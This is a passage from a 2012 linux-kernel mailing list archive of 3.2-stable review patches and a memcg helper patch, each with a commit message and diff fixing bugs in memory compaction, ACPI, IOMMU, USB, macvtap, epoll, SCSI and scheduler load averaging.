return ret;
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 040/108] mm, thp: abort compaction if migration page cannot be charged to memcg

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: David Rientjes 

commit 4bf2bba3750f10aa9e62e6949bc7e8329990f01b upstream.

If page migration cannot charge the temporary page to the memcg,
migrate_pages() will return -ENOMEM.  This isn't considered in memory
compaction however, and the loop continues to iterate over all
pageblocks trying to isolate and migrate pages.  If a small number of
very large memcgs happen to be oom, however, these attempts will mostly
be futile leading to an enormous amout of cpu consumption due to the
page migration failures.

This patch will short circuit and fail memory compaction if
migrate_pages() returns -ENOMEM.  COMPACT_PARTIAL is returned in case
some migrations were successful so that the page allocator will retry.

Signed-off-by: David Rientjes 
Acked-by: Mel Gorman 
Cc: Minchan Kim 
Cc: Kamezawa Hiroyuki 
Cc: Rik van Riel 
Cc: Andrea Arcangeli 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 mm/compaction.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/mm/compaction.c b/mm/compaction.c
index 7ea259d..2f42d95 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -701,8 +701,11 @@ static int compact_zone(struct zone *zone, struct 
compact_control *cc)
if (err) {
putback_lru_pages(&cc->migratepages);
cc->nr_migratepages = 0;
+   if (err == -ENOMEM) {
+   ret = COMPACT_PARTIAL;
+   goto out;
+   }
}
-
}
 
 out:


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 043/108] cpufreq / ACPI: Fix not loading acpi-cpufreq driver regression

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Thomas Renninger 

commit c4686c71a9183f76e3ef59098da5c098748672f6 upstream.

Commit d640113fe80e45ebd4a5b420b introduced a regression on SMP
systems where the processor core with ACPI id zero is disabled
(typically should be the case because of hyperthreading).
The regression got spread through stable kernels.
On 3.0.X it got introduced via 3.0.18.

Such platforms may be rare, but do exist.
Look out for a disabled processor with acpi_id 0 in dmesg:
ACPI: LAPIC (acpi_id[0x00] lapic_id[0x10] disabled)

This problem has been observed on a:
HP Proliant BL280c G6 blade

This patch restricts the introduced workaround to platforms
with nr_cpu_ids <= 1.

Signed-off-by: Thomas Renninger 
Signed-off-by: Rafael J. Wysocki 
Signed-off-by: Ben Hutchings 
---
 drivers/acpi/processor_core.c |6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/drivers/acpi/processor_core.c b/drivers/acpi/processor_core.c
index c850de4..eff7222 100644
--- a/drivers/acpi/processor_core.c
+++ b/drivers/acpi/processor_core.c
@@ -189,10 +189,12 @@ int acpi_get_cpuid(acpi_handle handle, int type, u32 
acpi_id)
 * Processor (CPU3, 0x03, 0x0410, 0x06) {}
 * }
 *
-* Ignores apic_id and always return 0 for CPU0's handle.
+* Ignores apic_id and always returns 0 for the processor
+* handle with acpi id 0 if nr_cpu_ids is 1.
+* This should be the case if SMP tables are not found.
 * Return -1 for other CPU's handle.
 */
-   if (acpi_id == 0)
+   if (nr_cpu_ids <= 1 && acpi_id == 0)
return acpi_id;
else
return apic_id;


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 051/108] intel_ips: blacklist HP ProBook laptops

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Takashi Iwai 

commit 88ca518b0bb4161e5f20f8a1d9cc477cae294e54 upstream.

intel_ips driver spews the warning message
  "ME failed to update for more than 1s, likely hung"
at each second endlessly on HP ProBook laptops with IronLake.

As this has never worked, better to blacklist the driver for now.

Signed-off-by: Takashi Iwai 
Signed-off-by: Matthew Garrett 
Signed-off-by: Ben Hutchings 
---
 drivers/platform/x86/intel_ips.c |   22 ++
 1 file changed, 22 insertions(+)

diff --git a/drivers/platform/x86/intel_ips.c b/drivers/platform/x86/intel_ips.c
index 0ffdb3c..9af4257 100644
--- a/drivers/platform/x86/intel_ips.c
+++ b/drivers/platform/x86/intel_ips.c
@@ -72,6 +72,7 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -1485,6 +1486,24 @@ static DEFINE_PCI_DEVICE_TABLE(ips_id_table) = {
 
 MODULE_DEVICE_TABLE(pci, ips_id_table);
 
+static int ips_blacklist_callback(const struct dmi_system_id *id)
+{
+   pr_info("Blacklisted intel_ips for %s\n", id->ident);
+   return 1;
+}
+
+static const struct dmi_system_id ips_blacklist[] = {
+   {
+   .callback = ips_blacklist_callback,
+   .ident = "HP ProBook",
+   .matches = {
+   DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"),
+   DMI_MATCH(DMI_PRODUCT_NAME, "HP ProBook"),
+   },
+   },
+   { } /* terminating entry */
+};
+
 static int ips_probe(struct pci_dev *dev, const struct pci_device_id *id)
 {
u64 platform_info;
@@ -1494,6 +1513,9 @@ static int ips_probe(struct pci_dev *dev, const struct 
pci_device_id *id)
u16 htshi, trc, trc_required_mask;
u8 tse;
 
+   if (dmi_check_system(ips_blacklist))
+   return -ENODEV;
+
ips = kzalloc(sizeof(struct ips_driver), GFP_KERNEL);
if (!ips)
return -ENOMEM;


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 025/108] iommu/amd: Initialize dma_ops for hotplug and sriov devices

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Joerg Roedel 

commit ac1534a55d1e87d59a21c09c570605933b551480 upstream.

When a device is added to the system at runtime the AMD
IOMMU driver initializes the necessary data structures to
handle translation for it. But it forgets to change the
per-device dma_ops to point to the AMD IOMMU driver. So
mapping actually never happens and all DMA accesses end in
an IO_PAGE_FAULT. Fix this.

Reported-by: Stefan Assmann 
Signed-off-by: Joerg Roedel 
[bwh: Backported to 3.2:
 - Adjust context
 - Use global iommu_pass_through; there is no per-device pass_through]
Signed-off-by: Ben Hutchings 
---
--- a/drivers/iommu/amd_iommu.c
+++ b/drivers/iommu/amd_iommu.c
@@ -59,6 +59,8 @@ static struct protection_domain *pt_doma
 
 static struct iommu_ops amd_iommu_ops;
 
+static struct dma_map_ops amd_iommu_dma_ops;
+
 /*
  * general struct to manage commands send to an IOMMU
  */
@@ -1878,6 +1880,11 @@ static int device_change_notifier(struct
list_add_tail(&dma_domain->list, &iommu_pd_list);
spin_unlock_irqrestore(&iommu_pd_list_lock, flags);
 
+   if (!iommu_pass_through)
+   dev->archdata.dma_ops = &amd_iommu_dma_ops;
+   else
+   dev->archdata.dma_ops = &nommu_dma_ops;
+
break;
case BUS_NOTIFY_DEL_DEVICE:
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 034/108] hwspinlock/core: use global ID to register hwspinlocks on multiple devices

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Shinya Kuribayashi 

commit 476a7eeb60e70ddab138e7cb4bc44ef5ac20782e upstream.

Commit 300bab9770 (hwspinlock/core: register a bank of hwspinlocks in a
single API call, 2011-09-06) introduced 'hwspin_lock_register_single()'
to register numerous (a bank of) hwspinlock instances in a single API,
'hwspin_lock_register()'.

At which time, 'hwspin_lock_register()' accidentally passes 'local IDs'
to 'hwspin_lock_register_single()', despite that ..._single() requires
'global IDs' to register hwspinlocks.

We have to convert into global IDs by supplying the missing 'base_id'.

Signed-off-by: Shinya Kuribayashi 
[ohad: fix error path of hwspin_lock_register, too]
Signed-off-by: Ohad Ben-Cohen 
Signed-off-by: Ben Hutchings 
---
 drivers/hwspinlock/hwspinlock_core.c |4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/hwspinlock/hwspinlock_core.c 
b/drivers/hwspinlock/hwspinlock_core.c
index 61c9cf1..1201a15 100644
--- a/drivers/hwspinlock/hwspinlock_core.c
+++ b/drivers/hwspinlock/hwspinlock_core.c
@@ -345,7 +345,7 @@ int hwspin_lock_register(struct hwspinlock_device *bank, 
struct device *dev,
spin_lock_init(&hwlock->lock);
hwlock->bank = bank;
 
-   ret = hwspin_lock_register_single(hwlock, i);
+   ret = hwspin_lock_register_single(hwlock, base_id + i);
if (ret)
goto reg_failed;
}
@@ -354,7 +354,7 @@ int hwspin_lock_register(struct hwspinlock_device *bank, 
struct device *dev,
 
 reg_failed:
while (--i >= 0)
-   hwspin_lock_unregister_single(i);
+   hwspin_lock_unregister_single(base_id + i);
return ret;
 }
 EXPORT_SYMBOL_GPL(hwspin_lock_register);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 038/108] memory hotplug: fix invalid memory access caused by stale kswapd pointer

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jiang Liu 

commit d8adde17e5f858427504725218c56aef90e90fc7 upstream.

kswapd_stop() is called to destroy the kswapd work thread when all memory
of a NUMA node has been offlined.  But kswapd_stop() only terminates the
work thread without resetting NODE_DATA(nid)->kswapd to NULL.  The stale
pointer will prevent kswapd_run() from creating a new work thread when
adding memory to the memory-less NUMA node again.  Eventually the stale
pointer may cause invalid memory access.

An example stack dump as below. It's reproduced with 2.6.32, but latest
kernel has the same issue.

  BUG: unable to handle kernel NULL pointer dereference at (null)
  IP: [] exit_creds+0x12/0x78
  PGD 0
  Oops:  [#1] SMP
  last sysfs file: /sys/devices/system/memory/memory391/state
  CPU 11
  Modules linked in: cpufreq_conservative cpufreq_userspace cpufreq_powersave 
acpi_cpufreq microcode fuse loop dm_mod tpm_tis rtc_cmos i2c_i801 rtc_core tpm 
serio_raw pcspkr sg tpm_bios igb i2c_core iTCO_wdt rtc_lib mptctl 
iTCO_vendor_support button dca bnx2 usbhid hid uhci_hcd ehci_hcd usbcore sd_mod 
crc_t10dif edd ext3 mbcache jbd fan ide_pci_generic ide_core ata_generic 
ata_piix libata thermal processor thermal_sys hwmon mptsas mptscsih mptbase 
scsi_transport_sas scsi_mod
  Pid: 7949, comm: sh Not tainted 2.6.32.12-qiuxishi-5-default #92 Tecal RH2285
  RIP: 0010:exit_creds+0x12/0x78
  RSP: 0018:8806044f1d78  EFLAGS: 00010202
  RAX:  RBX: 880604f22140 RCX: 00019502
  RDX:  RSI: 0202 RDI: 
  RBP: 880604f22150 R08:  R09: 81a4dc10
  R10: 32a0 R11: 880006202500 R12: 
  R13: 00c4 R14: 8000 R15: 0001
  FS:  7fbc03d066f0() GS:8800282e() knlGS:
  CS:  0010 DS:  ES:  CR0: 8005003b
  CR2:  CR3: 00060f029000 CR4: 06e0
  DR0:  DR1:  DR2: 
  DR3:  DR6: 0ff0 DR7: 0400
  Process sh (pid: 7949, threadinfo 8806044f, task 880603d7c600)
  Stack:
   880604f22140 8103aac5 880604f22140 8104d21e
   880006202500 8000 00c38000 810bd5b1
    880603d7c600 dd29 0003
  Call Trace:
__put_task_struct+0x5d/0x97
kthread_stop+0x50/0x58
offline_pages+0x324/0x3da
memory_block_change_state+0x179/0x1db
store_mem_state+0x9e/0xbb
sysfs_write_file+0xd0/0x107
vfs_write+0xad/0x169
sys_write+0x45/0x6e
system_call_fastpath+0x16/0x1b
  Code: ff 4d 00 0f 94 c0 84 c0 74 08 48 89 ef e8 1f fd ff ff 5b 5d 31 c0 41 5c 
c3 53 48 8b 87 20 06 00 00 48 89 fb 48 8b bf 18 06 00 00 <8b> 00 48 c7 83 18 06 
00 00 00 00 00 00 f0 ff 0f 0f 94 c0 84 c0
  RIP  exit_creds+0x12/0x78
   RSP 
  CR2: 

[a...@linux-foundation.org: add pglist_data.kswapd locking comments]
Signed-off-by: Xishi Qiu 
Signed-off-by: Jiang Liu 
Acked-by: KAMEZAWA Hiroyuki 
Acked-by: KOSAKI Motohiro 
Acked-by: Mel Gorman 
Acked-by: David Rientjes 
Reviewed-by: Minchan Kim 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 include/linux/mmzone.h |2 +-
 mm/vmscan.c|7 +--
 2 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
index 2427706..68c569f 100644
--- a/include/linux/mmzone.h
+++ b/include/linux/mmzone.h
@@ -694,7 +694,7 @@ typedef struct pglist_data {
 range, including holes */
int node_id;
wait_queue_head_t kswapd_wait;
-   struct task_struct *kswapd;
+   struct task_struct *kswapd; /* Protected by lock_memory_hotplug() */
int kswapd_max_order;
enum zone_type classzone_idx;
 } pg_data_t;
diff --git a/mm/vmscan.c b/mm/vmscan.c
index eeb3bc9..6615763 100644
--- a/mm/vmscan.c
+++ b/mm/vmscan.c
@@ -2955,14 +2955,17 @@ int kswapd_run(int nid)
 }
 
 /*
- * Called by memory hotplug when all memory in a node is offlined.
+ * Called by memory hotplug when all memory in a node is offlined.  Caller must
+ * hold lock_memory_hotplug().
  */
 void kswapd_stop(int nid)
 {
struct task_struct *kswapd = NODE_DATA(nid)->kswapd;
 
-   if (kswapd)
+   if (kswapd) {
kthread_stop(kswapd);
+   NODE_DATA(nid)->kswapd = NULL;
+   }
 }
 
 static int __init kswapd_init(void)


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 026/108] usb: Add support for root hub port status CAS

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Stanislaw Ledwon 

commit 8bea2bd37df08aaa599aa361a9f8b836ba98e554 upstream.

The host controller port status register supports CAS (Cold Attach
Status) bit. This bit could be set when USB3.0 device is connected
when system is in Sx state. When the system wakes to S0 this port
status with CAS bit is reported and this port can't be used by any
device.

When CAS bit is set the port should be reset by warm reset. This
was not supported by xhci driver.

The issue was found when pendrive was connected to suspended
platform. The link state of "Compliance Mode" was reported together
with CAS bit. This link state was also not supported by xhci and
core/hub.c.

The CAS bit is defined only for xhci root hub port and it is
not supported on regular hubs. The link status is used to force
warm reset on port. Make the USB core issue a warm reset when port
is in ether the 'inactive' or 'compliance mode'. Change the xHCI driver
to report 'compliance mode' when the CAS is set. This force warm reset
on the root hub port.

This patch should be backported to stable kernels as old as 3.2, that
contain the commit 10d674a82e553cb8a1f41027bb3c3e309b3f6804 "USB: When
hot reset for USB3 fails, try warm reset."

Signed-off-by: Stanislaw Ledwon 
Signed-off-by: Sarah Sharp 
Acked-by: Andiry Xu 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/core/hub.c  |   18 ++
 drivers/usb/host/xhci-hub.c |   44 +--
 drivers/usb/host/xhci.h |6 +-
 3 files changed, 53 insertions(+), 15 deletions(-)

diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
index 25a7422..8fb4849 100644
--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -2324,12 +2324,16 @@ static unsigned hub_is_wusb(struct usb_hub *hub)
 static int hub_port_reset(struct usb_hub *hub, int port1,
struct usb_device *udev, unsigned int delay, bool warm);
 
-/* Is a USB 3.0 port in the Inactive state? */
-static bool hub_port_inactive(struct usb_hub *hub, u16 portstatus)
+/* Is a USB 3.0 port in the Inactive or Complinance Mode state?
+ * Port worm reset is required to recover
+ */
+static bool hub_port_warm_reset_required(struct usb_hub *hub, u16 portstatus)
 {
return hub_is_superspeed(hub->hdev) &&
-   (portstatus & USB_PORT_STAT_LINK_STATE) ==
-   USB_SS_PORT_LS_SS_INACTIVE;
+   (((portstatus & USB_PORT_STAT_LINK_STATE) ==
+ USB_SS_PORT_LS_SS_INACTIVE) ||
+((portstatus & USB_PORT_STAT_LINK_STATE) ==
+ USB_SS_PORT_LS_COMP_MOD)) ;
 }
 
 static int hub_port_wait_reset(struct usb_hub *hub, int port1,
@@ -2365,7 +2369,7 @@ static int hub_port_wait_reset(struct usb_hub *hub, int 
port1,
 *
 * See https://bugzilla.kernel.org/show_bug.cgi?id=41752
 */
-   if (hub_port_inactive(hub, portstatus)) {
+   if (hub_port_warm_reset_required(hub, portstatus)) {
int ret;
 
if ((portchange & USB_PORT_STAT_C_CONNECTION))
@@ -4408,9 +4412,7 @@ static void hub_events(void)
/* Warm reset a USB3 protocol port if it's in
 * SS.Inactive state.
 */
-   if (hub_is_superspeed(hub->hdev) &&
-   (portstatus & USB_PORT_STAT_LINK_STATE)
-   == USB_SS_PORT_LS_SS_INACTIVE) {
+   if (hub_port_warm_reset_required(hub, portstatus)) {
dev_dbg(hub_dev, "warm reset port %d\n", i);
hub_port_reset(hub, i, NULL,
HUB_BH_RESET_TIME, true);
diff --git a/drivers/usb/host/xhci-hub.c b/drivers/usb/host/xhci-hub.c
index 2732ef6..7b01094 100644
--- a/drivers/usb/host/xhci-hub.c
+++ b/drivers/usb/host/xhci-hub.c
@@ -462,6 +462,42 @@ void xhci_test_and_clear_bit(struct xhci_hcd *xhci, __le32 
__iomem **port_array,
}
 }
 
+/* Updates Link Status for super Speed port */
+static void xhci_hub_report_link_state(u32 *status, u32 status_reg)
+{
+   u32 pls = status_reg & PORT_PLS_MASK;
+
+   /* resume state is a xHCI internal state.
+* Do not report it to usb core.
+*/
+   if (pls == XDEV_RESUME)
+   return;
+
+   /* When the CAS bit is set then warm reset
+* should be performed on port
+*/
+   if (status_reg & PORT_CAS) {
+   /* The CAS bit can be set while the port is
+* in any link state.
+* Only roothubs have CAS bit, so we
+* pretend to be in compliance mode
+* unless we're already in compliance
+* or the inactive state.
+   

[ 020/108] macvtap: zerocopy: validate vectors before building skb

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jason Wang 

commit b92946e2919134ebe2a4083e4302236295ea2a73 upstream.

There're several reasons that the vectors need to be validated:

- Return error when caller provides vectors whose num is greater than 
UIO_MAXIOV.
- Linearize part of skb when userspace provides vectors grater than 
MAX_SKB_FRAGS.
- Return error when userspace provides vectors whose total length may exceed
- MAX_SKB_FRAGS * PAGE_SIZE.

Signed-off-by: Jason Wang 
Signed-off-by: Michael S. Tsirkin 
Signed-off-by: Ben Hutchings 
---
 drivers/net/macvtap.c |   25 +
 1 file changed, 21 insertions(+), 4 deletions(-)

diff --git a/drivers/net/macvtap.c b/drivers/net/macvtap.c
index a4ff694..163559c 100644
--- a/drivers/net/macvtap.c
+++ b/drivers/net/macvtap.c
@@ -529,9 +529,10 @@ static int zerocopy_sg_from_iovec(struct sk_buff *skb, 
const struct iovec *from,
}
base = (unsigned long)from->iov_base + offset;
size = ((base & ~PAGE_MASK) + len + ~PAGE_MASK) >> PAGE_SHIFT;
+   if (i + size > MAX_SKB_FRAGS)
+   return -EMSGSIZE;
num_pages = get_user_pages_fast(base, size, 0, &page[i]);
-   if ((num_pages != size) ||
-   (num_pages > MAX_SKB_FRAGS - skb_shinfo(skb)->nr_frags)) {
+   if (num_pages != size) {
for (i = 0; i < num_pages; i++)
put_page(page[i]);
return -EFAULT;
@@ -651,7 +652,7 @@ static ssize_t macvtap_get_user(struct macvtap_queue *q, 
struct msghdr *m,
int err;
struct virtio_net_hdr vnet_hdr = { 0 };
int vnet_hdr_len = 0;
-   int copylen;
+   int copylen = 0;
bool zerocopy = false;
 
if (q->flags & IFF_VNET_HDR) {
@@ -680,15 +681,31 @@ static ssize_t macvtap_get_user(struct macvtap_queue *q, 
struct msghdr *m,
if (unlikely(len < ETH_HLEN))
goto err;
 
+   err = -EMSGSIZE;
+   if (unlikely(count > UIO_MAXIOV))
+   goto err;
+
if (m && m->msg_control && sock_flag(&q->sk, SOCK_ZEROCOPY))
zerocopy = true;
 
if (zerocopy) {
+   /* Userspace may produce vectors with count greater than
+* MAX_SKB_FRAGS, so we need to linearize parts of the skb
+* to let the rest of data to be fit in the frags.
+*/
+   if (count > MAX_SKB_FRAGS) {
+   copylen = iov_length(iv, count - MAX_SKB_FRAGS);
+   if (copylen < vnet_hdr_len)
+   copylen = 0;
+   else
+   copylen -= vnet_hdr_len;
+   }
/* There are 256 bytes to be copied in skb, so there is enough
 * room for skb expand head in case it is used.
 * The rest buffer is mapped from userspace.
 */
-   copylen = vnet_hdr.hdr_len;
+   if (copylen < vnet_hdr.hdr_len)
+   copylen = vnet_hdr.hdr_len;
if (!copylen)
copylen = GOODCOPY_LEN;
} else



--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 023/108] epoll: clear the tfile_check_list on -ELOOP

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jason Baron 

commit 13d518074a952d33d47c428419693f63389547e9 upstream.

An epoll_ctl(,EPOLL_CTL_ADD,,) operation can return '-ELOOP' to prevent
circular epoll dependencies from being created.  However, in that case we
do not properly clear the 'tfile_check_list'.  Thus, add a call to
clear_tfile_check_list() for the -ELOOP case.

Signed-off-by: Jason Baron 
Reported-by: Yurij M. Plotnikov 
Cc: Nelson Elhage 
Cc: Davide Libenzi 
Tested-by: Alexandra N. Kossovsky 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/eventpoll.c |4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/fs/eventpoll.c b/fs/eventpoll.c
index 739b098..c0b3c70 100644
--- a/fs/eventpoll.c
+++ b/fs/eventpoll.c
@@ -1663,8 +1663,10 @@ SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
if (op == EPOLL_CTL_ADD) {
if (is_file_epoll(tfile)) {
error = -ELOOP;
-   if (ep_loop_check(ep, tfile) != 0)
+   if (ep_loop_check(ep, tfile) != 0) {
+   clear_tfile_check_list();
goto error_tgt_fput;
+   }
} else
list_add(&tfile->f_tfile_llink, &tfile_check_list);
}


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH v2] memcg: add mem_cgroup_from_css() helper

2012-07-22 Thread Wanpeng Li
Changelog v2:
* fix too many args to mem_cgroup_from_css() (spotted by Kirill A. Shutemov)
* fix kernel build failed (spotted by Fengguang)

Add a mem_cgroup_from_css() helper to replace open-coded invokations of
container_of().  To clarify the code and to add a little more type safety.

Acked-by: Michal Hocko 
Signed-off-by: Wanpeng Li 

---
 mm/memcontrol.c |   19 +++
 1 files changed, 11 insertions(+), 8 deletions(-)

diff --git a/mm/memcontrol.c b/mm/memcontrol.c
index 883283d..f0c7639 100644
--- a/mm/memcontrol.c
+++ b/mm/memcontrol.c
@@ -407,6 +407,12 @@ enum charge_type {
 static void mem_cgroup_get(struct mem_cgroup *memcg);
 static void mem_cgroup_put(struct mem_cgroup *memcg);
 
+static inline 
+struct mem_cgroup *mem_cgroup_from_css(struct cgroup_subsys_state *s)
+{
+   return container_of(s, struct mem_cgroup, css);
+}
+
 /* Writing them here to avoid exposing memcg's inner layout */
 #ifdef CONFIG_CGROUP_MEM_RES_CTLR_KMEM
 #include 
@@ -864,9 +870,8 @@ static void memcg_check_events(struct mem_cgroup *memcg, 
struct page *page)
 
 struct mem_cgroup *mem_cgroup_from_cont(struct cgroup *cont)
 {
-   return container_of(cgroup_subsys_state(cont,
-   mem_cgroup_subsys_id), struct mem_cgroup,
-   css);
+   return mem_cgroup_from_css(cgroup_subsys_state(cont,
+   mem_cgroup_subsys_id));
 }
 
 struct mem_cgroup *mem_cgroup_from_task(struct task_struct *p)
@@ -879,8 +884,7 @@ struct mem_cgroup *mem_cgroup_from_task(struct task_struct 
*p)
if (unlikely(!p))
return NULL;
 
-   return container_of(task_subsys_state(p, mem_cgroup_subsys_id),
-   struct mem_cgroup, css);
+   return mem_cgroup_from_css(task_subsys_state(p, mem_cgroup_subsys_id));
 }
 
 struct mem_cgroup *try_get_mem_cgroup_from_mm(struct mm_struct *mm)
@@ -966,8 +970,7 @@ struct mem_cgroup *mem_cgroup_iter(struct mem_cgroup *root,
css = css_get_next(&mem_cgroup_subsys, id + 1, &root->css, &id);
if (css) {
if (css == &root->css || css_tryget(css))
-   memcg = container_of(css,
-struct mem_cgroup, css);
+   memcg = mem_cgroup_from_css(css);
} else
id = 0;
rcu_read_unlock();
@@ -2429,7 +2432,7 @@ static struct mem_cgroup *mem_cgroup_lookup(unsigned 
short id)
css = css_lookup(&mem_cgroup_subsys, id);
if (!css)
return NULL;
-   return container_of(css, struct mem_cgroup, css);
+   return mem_cgroup_from_css(css);
 }
 
 struct mem_cgroup *try_get_mem_cgroup_from_page(struct page *page)
-- 
1.7.7.6

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 022/108] scsi: Silence unnecessary warnings about ioctl to partition

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jan Kara 

commit 6d9359280753d2955f86d6411047516a9431eb51 upstream.

Sometimes, warnings about ioctls to partition happen often enough that they
form majority of the warnings in the kernel log and users complain. In some
cases warnings are about ioctls such as SG_IO so it's not good to get rid of
the warnings completely as they can ease debugging of userspace problems
when ioctl is refused.

Since I have seen warnings from lots of commands, including some proprietary
userspace applications, I don't think disallowing the ioctls for processes
with CAP_SYS_RAWIO will happen in the near future if ever. So lets just
stop warning for processes with CAP_SYS_RAWIO for which ioctl is allowed.

CC: Paolo Bonzini 
CC: James Bottomley 
CC: linux-s...@vger.kernel.org
Acked-by: Paolo Bonzini 
Signed-off-by: Jan Kara 
Signed-off-by: Jens Axboe 
[bwh: Backported to 3.2: use ENOTTY, not ENOIOCTLCMD]
Signed-off-by: Ben Hutchings 
---
 block/scsi_ioctl.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

--- a/block/scsi_ioctl.c
+++ b/block/scsi_ioctl.c
@@ -721,11 +721,14 @@ int scsi_verify_blk_ioctl(struct block_device *bd, 
unsigned int cmd)
break;
}
 
+   if (capable(CAP_SYS_RAWIO))
+   return 0;
+
/* In particular, rule out all resets and host-specific ioctls.  */
printk_ratelimited(KERN_WARNING
   "%s: sending ioctl %x to a partition!\n", 
current->comm, cmd);
 
-   return capable(CAP_SYS_RAWIO) ? 0 : -ENOTTY;
+   return -ENOTTY;
 }
 EXPORT_SYMBOL(scsi_verify_blk_ioctl);
 



--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 028/108] sched/nohz: Rewrite and fix load-avg computation -- again

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Peter Zijlstra 

commit 5167e8d5417bf5c322a703d2927daec727ea40dd upstream.

Thanks to Charles Wang for spotting the defects in the current code:

 - If we go idle during the sample window -- after sampling, we get a
   negative bias because we can negate our own sample.

 - If we wake up during the sample window we get a positive bias
   because we push the sample to a known active period.

So rewrite the entire nohz load-avg muck once again, now adding
copious documentation to the code.

Reported-and-tested-by: Doug Smythies 
Reported-and-tested-by: Charles Wang 
Signed-off-by: Peter Zijlstra 
Cc: Linus Torvalds 
Cc: Andrew Morton 
Link: http://lkml.kernel.org/r/1340373782.18025.74.camel@twins
[ minor edits ]
Signed-off-by: Ingo Molnar 
[bwh: Backported to 3.2: adjust filenames, context]
Signed-off-by: Ben Hutchings 
---
 include/linux/sched.h|8 ++
 kernel/sched/core.c  |  275 ++
 kernel/sched/idle_task.c |1 -
 kernel/sched/sched.h |2 -
 kernel/time/tick-sched.c |2 +
 5 files changed, 213 insertions(+), 75 deletions(-)

--- a/include/linux/sched.h
+++ b/include/linux/sched.h
@@ -1892,6 +1892,14 @@ static inline int set_cpus_allowed_ptr(s
 }
 #endif
 
+#ifdef CONFIG_NO_HZ
+void calc_load_enter_idle(void);
+void calc_load_exit_idle(void);
+#else
+static inline void calc_load_enter_idle(void) { }
+static inline void calc_load_exit_idle(void) { }
+#endif /* CONFIG_NO_HZ */
+
 #ifndef CONFIG_CPUMASK_OFFSTACK
 static inline int set_cpus_allowed(struct task_struct *p, cpumask_t new_mask)
 {
--- a/kernel/sched.c
+++ b/kernel/sched.c
@@ -1885,7 +1885,6 @@ static void double_rq_unlock(struct rq *
 
 #endif
 
-static void calc_load_account_idle(struct rq *this_rq);
 static void update_sysctl(void);
 static int get_update_sysctl_factor(void);
 static void update_cpu_load(struct rq *this_rq);
@@ -3401,11 +3400,73 @@ unsigned long this_cpu_load(void)
 }
 
 
+/*
+ * Global load-average calculations
+ *
+ * We take a distributed and async approach to calculating the global load-avg
